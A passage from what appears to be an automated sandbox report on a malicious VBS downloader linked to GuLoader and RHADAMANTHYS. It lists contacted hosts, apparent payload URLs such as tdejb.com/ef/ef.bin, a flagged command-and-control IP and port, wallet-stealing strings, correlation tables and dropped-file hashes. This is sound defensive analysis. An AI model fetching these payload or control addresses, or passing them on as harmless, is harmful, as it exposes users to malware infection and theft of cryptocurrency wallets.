                                      		truefalse
                                        		high
                                        ntp1.hetzner.de
                                        		213.239.239.164
                                        		truefalse
                                          		high
                                          time.windows.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.tdejb.com
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              https://www.tdejb.com/ef/Skifterne.seafalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.tdejb.com/ef/ef.binfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.2340099936.0000020FC41F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2557862316.0000000005AEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.tdejb.compowershell.exe, 00000005.00000002.2309530129.0000020FB5DE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://127.0.0.1:%u/json/list?t=%uwmpshare.exe, 00000022.00000003.3175098577.0000028188A01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.2542474955.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.2542474955.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://microsoft.copowershell.exe, 00000005.00000002.2348383471.0000020FCC829000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://go.micropowershell.exe, 00000005.00000002.2309530129.0000020FB4D46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://tdejb.compowershell.exe, 00000005.00000002.2309530129.0000020FB5DE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.microsoft.copowershell.exe, 00000005.00000002.2348383471.0000020FCC829000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2348383471.0000020FCC7CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/Licensepowershell.exe, 0000000C.00000002.2557862316.0000000005AEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/Iconpowershell.exe, 0000000C.00000002.2557862316.0000000005AEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000A.00000003.2293909859.0000020984340000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crl.ver)svchost.exe, 0000000A.00000002.3434041503.0000020984400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.tdejb.com/ef/ef.binGalisGrawww.puneet.ae/ef/ef.binmsiexec.exe, 00000013.00000002.2743933601.0000000023760000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.2542474955.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://g.live.com/odclientsettings/Prod1C:svchost.exe, 0000000A.00000003.2293909859.000002098439E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://aka.ms/pscore6lBpowershell.exe, 0000000C.00000002.2542474955.0000000004A81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contoso.com/powershell.exe, 0000000C.00000002.2557862316.0000000005AEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.2340099936.0000020FC41F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2557862316.0000000005AEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://127.0.0.1:%u/json/list?t=%uws:exodus.jsExodusatomic.jsAtomicguarda.jsGuardainfinity.jsInfinitwmpshare.exe, 00000022.00000003.3175098577.0000028188A01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://87.120.127.215:3847/6d41b386417b9c328d8/i4rtpd4n.psnutsvchost.exefalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://aka.ms/pscore68powershell.exe, 00000005.00000002.2309530129.0000020FB4181000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.microsoft.cyfpowershell.exe, 00000005.00000002.2348383471.0000020FCC829000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2309530129.0000020FB4181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2542474955.0000000004A81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.arecosaldature.it/ef/Skifterne.seapowershell.exe, 00000005.00000002.2309530129.0000020FB5746000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2309530129.0000020FB43A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2542474955.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.tdejb.compowershell.exe, 00000005.00000002.2309530129.0000020FB5746000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2309530129.0000020FB43A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                162.159.200.1
                                                                                		time.cloudflare.comUnited States
                                                                                		13335CLOUDFLARENETUSfalse
                                                                                213.239.239.164
                                                                                		ntp1.hetzner.deGermany
                                                                                		24940HETZNER-ASDEfalse
                                                                                62.149.0.30
                                                                                		ntp.time.in.uaUkraine
                                                                                		15497COLOCALLInternetDataCenterColoCALLUAfalse
                                                                                129.6.15.28
                                                                                		time-a-g.nist.govUnited States
                                                                                		49US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUSfalse
                                                                                193.171.23.163
                                                                                		ts1.aco.netAustria
                                                                                		1853ACONETACOnetBackboneATfalse
                                                                                87.120.127.215
                                                                                		unknownBulgaria
                                                                                		25206UNACS-AS-BG8000BurgasBGtrue
                                                                                162.159.61.3
                                                                                		chrome.cloudflare-dns.comUnited States
                                                                                		13335CLOUDFLARENETUSfalse
                                                                                45.149.241.141
                                                                                		unknownGermany
                                                                                		701UUNETUSfalse
                                                                                129.134.29.123
                                                                                		time.facebook.comUnited States
                                                                                		32934FACEBOOKUSfalse
                                                                                202.71.109.228
                                                                                		tdejb.comMalaysia
                                                                                		17971TMVADS-APTM-VADSDCHostingMYfalse

                                                                                Private

                                                                                IP
                                                                                127.0.0.1

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1577818
                                                                                Start date and time:2024-12-18 19:26:10 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 9m 40s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:36
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:g8ix97hz.vbs
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.expl.evad.winVBS@43/120@12/11
                                                                                EGA Information:
                                                                                • Successful, ratio: 42.9%
                                                                                HCA Information:
                                                                                • Successful, ratio: 65%
                                                                                • Number of executed functions: 182
                                                                                • Number of non-executed functions: 21
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .vbs

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 2.20.68.201, 2.20.68.210, 23.218.208.109, 17.253.18.99, 17.253.14.251, 17.253.18.131, 40.81.94.65, 142.250.181.99, 172.217.17.78, 64.233.162.84, 13.107.42.16, 204.79.197.239, 13.107.21.239, 13.107.6.158, 20.190.181.4, 20.223.35.26, 13.107.246.63, 2.19.193.51, 150.171.28.10, 20.199.58.43, 4.245.163.56, 52.149.20.212
                                                                                • Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, twc.trafficmanager.net, tse1.mm.bing.net, clientservices.googleapis.com, g.bing.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, clients2.google.com, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, time.g.aaplimg.com, prod.fs.microsoft.com.akadns.net, l-0007.l-msedge.net, wu-b-net.trafficmanager.net, config.edge.skype.com, www.bing.com, edge-microsoft-com.dual-a-0036.a-msedge.net, client.wns.windows.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, time.apple.com, ctldl.windowsupdate.com, b-0005.b-msedge.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, l-0007.config.skype.com
                                                                                • Execution Graph export aborted for target msiexec.exe, PID 4156 because there are no executed function
                                                                                • Execution Graph export aborted for target powershell.exe, PID 524 because it is empty
                                                                                • Execution Graph export aborted for target powershell.exe, PID 7756 because it is empty
                                                                                • Execution Graph export aborted for target svchost.exe, PID 3604 because there are no executed function
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: g8ix97hz.vbs

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                13:27:05API Interceptor1x Sleep call for process: wscript.exe modified
                                                                                13:27:05API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                13:27:08API Interceptor81x Sleep call for process: powershell.exe modified
                                                                                13:27:18API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                13:28:44API Interceptor1x Sleep call for process: wmpshare.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                162.159.200.1ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                  download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                    filezilla-3.17.0.0.0-installer_yr3oq-1.exeGet hashmaliciousUnknownBrowse
                                                                                      FileZilla_3.50.0_win64-setup.exeGet hashmaliciousUnknownBrowse
                                                                                        FileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousUnknownBrowse
                                                                                          FileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousUnknownBrowse
                                                                                            213.239.239.164List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                              payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                    download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                      62.149.0.30H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                        payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                          List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                            ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                              download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                  129.6.15.28H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                    HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                      payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                        wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                          Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                                                            mirai_nomiGet hashmaliciousMiraiBrowse
                                                                                                                              SecuriteInfo.com.Other.Malware-gen.28386.14039.elfGet hashmaliciousMiraiBrowse
                                                                                                                                SecuriteInfo.com.Other.Malware-gen.3200.4135.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  SecuriteInfo.com.Other.Malware-gen.31307.16494.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    SecuriteInfo.com.Linux.Siggen.6954.6684.13146.elfGet hashmaliciousMiraiBrowse

                                                                                                                                      Domains

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      time.cloudflare.comH3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                      • 162.159.200.123
                                                                                                                                      HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                      • 162.159.200.123
                                                                                                                                      payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                      • 162.159.200.123
                                                                                                                                      List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                      • 162.159.200.123
                                                                                                                                      ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                      • 162.159.200.1
                                                                                                                                      download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                      • 162.159.200.1
                                                                                                                                      chrome.cloudflare-dns.comH3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                      • 162.159.61.3
                                                                                                                                      HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                      • 162.159.61.3
                                                                                                                                      ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.61.3
                                                                                                                                      NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.64.41.3
                                                                                                                                      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                      • 162.159.61.3
                                                                                                                                      EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.61.3
                                                                                                                                      YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 172.64.41.3
                                                                                                                                      CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.64.41.3
                                                                                                                                      CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 162.159.61.3
                                                                                                                                      122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                      • 162.159.61.3
                                                                                                                                      ntp.time.in.uaH3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                      • 62.149.0.30
                                                                                                                                      payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                      • 62.149.0.30
                                                                                                                                      List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                      • 62.149.0.30
                                                                                                                                      ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                      • 62.149.0.30
                                                                                                                                      download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                      • 62.149.0.30
                                                                                                                                      wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                      • 62.149.0.30

                                                                                                                                      ASNs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      CLOUDFLARENETUShttps://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.16.123.96
                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                      • 172.67.131.246
                                                                                                                                      https://em.navan.com/MDM3LUlLWi04NzEAAAGXecU3IyvXka_yOfm1UXs3oOmq7mq-S6uBgGscrsY0kWMgpLalbadmEIYbTEXYqyKQHEXyRQM=Get hashmaliciousUnknownBrowse
                                                                                                                                      • 104.16.79.73
                                                                                                                                      A file has been sent to you via DROPBOX.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.17.25.14
                                                                                                                                      https://usps.com-parcelbvxce.vip/i/Get hashmaliciousUnknownBrowse
                                                                                                                                      • 104.21.4.80
                                                                                                                                      http://golden1-alert.net/onlineGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.17.25.14
                                                                                                                                      Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                      • 172.67.218.192
                                                                                                                                      'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 172.67.179.225
                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 104.21.88.199
                                                                                                                                      COLOCALLInternetDataCenterColoCALLUAH3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                      • 62.149.0.30
                                                                                                                                      izCOFC8OWh.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 62.149.0.249
                                                                                                                                      payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                      • 62.149.0.30
                                                                                                                                      List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                      • 62.149.0.30
                                                                                                                                      ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                      • 62.149.0.30
                                                                                                                                      splmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 31.28.168.19
                                                                                                                                      download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                      • 62.149.0.30
                                                                                                                                      wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                      • 62.149.0.30
                                                                                                                                      http://pint77.com/Get hashmaliciousUnknownBrowse
                                                                                                                                      • 62.149.0.249
                                                                                                                                      DHL_2017128_Receipt_Document,pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 31.28.171.149
                                                                                                                                      HETZNER-ASDEroblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                      • 135.181.65.219
                                                                                                                                      roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                      • 135.181.65.219
                                                                                                                                      loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 195.201.143.203
                                                                                                                                      random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                      • 135.181.65.219
                                                                                                                                      mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                      • 116.202.93.69
                                                                                                                                      3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 136.243.79.47
                                                                                                                                      5.msiGet hashmaliciousDanaBot, NitolBrowse
                                                                                                                                      • 148.251.107.246
                                                                                                                                      Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                      • 116.203.12.114
                                                                                                                                      https://6movies.stream/series/cobra-kai-80711/6-4/Get hashmaliciousUnknownBrowse
                                                                                                                                      • 136.243.81.150
                                                                                                                                      uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                                                                                                                      • 116.202.150.27

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ehttp://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onionGet hashmaliciousUnknownBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      1734537007a22115ccf81804870f6743791426a5c4263cfc792e757756373d12e0d21d0600610.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      yoyf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      yoyf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      37f463bf4616ecd445d4a1937da06e19Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      z68scancopy.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      oiBxz37xUo.dllGet hashmaliciousUnknownBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      oiBxz37xUo.dllGet hashmaliciousUnknownBrowse
                                                                                                                                      • 202.71.109.228
                                                                                                                                      7nJ9Jo78Vq.dllGet hashmaliciousUnknownBrowse
                                                                                                                                      • 202.71.109.228

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1310720
                                                                                                                                      Entropy (8bit):0.7263449298215208
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0V:9JZj5MiKNnNhoxuY
                                                                                                                                      MD5:8F4C761FB558B2EB8049E8538B3FF7E5
                                                                                                                                      SHA1:0765D0BAB40FB04EC16EBD8C4226DC5EECB753FC
                                                                                                                                      SHA-256:CB8FA1555E2E9DB14471C2161141B012B1F9556B3A499B500A5ACACD7A842EBE
                                                                                                                                      SHA-512:9D4FFB2C586FCFDB3AD1CE6BA72FD766CDB2930293B19115F5ED968C082AA7FA6AA16F5FDB48797C910424F8C3C825E8709F555705B47FF70FF2250CE2ECE26E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                      File Type:Extensible storage user DataBase, version 0x620, checksum 0xaf5b0814, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1310720
                                                                                                                                      Entropy (8bit):0.7556077028290847
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:1SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:1azaSvGJzYj2UlmOlOL
                                                                                                                                      MD5:EE90C86CB74329F8B0BBFB4CD1100556
                                                                                                                                      SHA1:C5F80F9693657C08FBB29E942F9EBFFB2157C088
                                                                                                                                      SHA-256:06B0565F31025C1AA93E43D9F3AEFFE1D69A8915D75F573B826076A4C24F87FD
                                                                                                                                      SHA-512:8485188CE954E3CCE5F88819D7367120EFA1C46CFDF05C45A91A4FA584D3F4967D7013274FA0571C5ADBC6DD26165876F88EEF42F206A9B324F14DAEB303A71A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.[..... .......7.......X\...;...{......................0.e......!...{?......|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{...................................v4......|-.................}.l3.....|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16384
                                                                                                                                      Entropy (8bit):0.07859809790663072
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3tlEYeAI3pZc373NaAPaU1lp3cltAlluxmO+l/SNxOf:3XEz7p+DNDPaUhcXAgmOH
                                                                                                                                      MD5:3828922645DC4196D5DFA1A3F5117B22
                                                                                                                                      SHA1:18A46848C181FE5EACF8A618E4A71AB2CC261B11
                                                                                                                                      SHA-256:B6733AD385C779C734562FA188B51E2C1C0DF83A76CA85045B53AB63F97DC5E2
                                                                                                                                      SHA-512:7E6E7B9DF96679EAC9F79E72F40DBF2993974F105088A82AC2B4F326F6B0132E242A94C028D91AA4287C1DD7B274F84882267924D51C7971621B12B0980DBF23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.........................................;...{.......|...!...{?..........!...{?..!...{?..g...!...{?.................}.l3.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):71954
                                                                                                                                      Entropy (8bit):7.996617769952133
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                      Malicious:false
